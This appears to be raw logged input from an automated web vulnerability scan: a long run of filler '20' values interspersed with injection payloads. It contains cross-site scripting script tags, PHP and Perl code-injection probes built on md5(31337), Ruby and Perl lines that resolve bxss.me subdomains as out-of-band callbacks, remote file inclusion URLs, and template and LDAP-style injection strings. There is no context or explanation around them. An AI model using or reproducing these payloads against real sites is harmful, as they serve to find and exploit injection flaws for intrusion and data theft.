20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
209636569
20
20
20
20
'"()&%<acx><ScRiPt >c8Cg(9431)</ScRiPt>
20
20
20
20
20'"()&%<acx><ScRiPt >c8Cg(9448)</ScRiPt>
<!--
20
20
20
20
'"
20
20
20
20
20
20
20
/xfs.bxss.me
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
20
20
index.php/.
20
20
20
20
index.php
20
20
'+'A'.concat(70-3).concat(22*4).concat(106).concat(79).concat(111).concat(90)+(require'socket'
Socket.gethostbyname('hitpt'+'rrvazeuz4470e.bxss.me.')[3].to_s)+'
20
index.php
'.print(md5(31337)).'
20
"+"A".concat(70-3).concat(22*4).concat(108).concat(82).concat(100).concat(70)+(require"socket"
Socket.gethostbyname("hitgq"+"hjkpcssg67ce3.bxss.me.")[3].to_s)+"
bxss.me/t/xss.html?%00
20
${@print(md5(31337))}\
20
20
https://bxss.me/t/xss.html?%00
20
${@print(md5(31337))}
20
20
20
20
";print(md5(31337));$a="
20
20
20
20
';print(md5(31337));$a='
20
20
20
20
;print(md5(31337));
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
".gethostbyname(lc("hitwm"."zapnorxv9dc75.bxss.me."))."A".chr(67).chr(hex("58")).chr(116).chr(76).chr(122).chr(70)."
20
20
20
20
'.gethostbyname(lc('hitoi'.'wcwwknhg59a77.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(114).chr(76).chr(108).chr(82).'
20
20
20
^(#$!@#$)(()))******
20
20
20
20
!(()&&!|*|*|
20
20
20
20
)
20
20
20&n931750=v979616
20
20
20
bxss.me
20
20
20
20
https://bxss.me/t/fit.txt?.jpg
20
20
20
20
https://bxss.me/t/fit.txt
20
20
20
20
1some_inexistent_file_with_long_name .jpg
20
20
20
20
https://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg
20
20
20
20
20
20
20
${10000180+9999046}
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20
20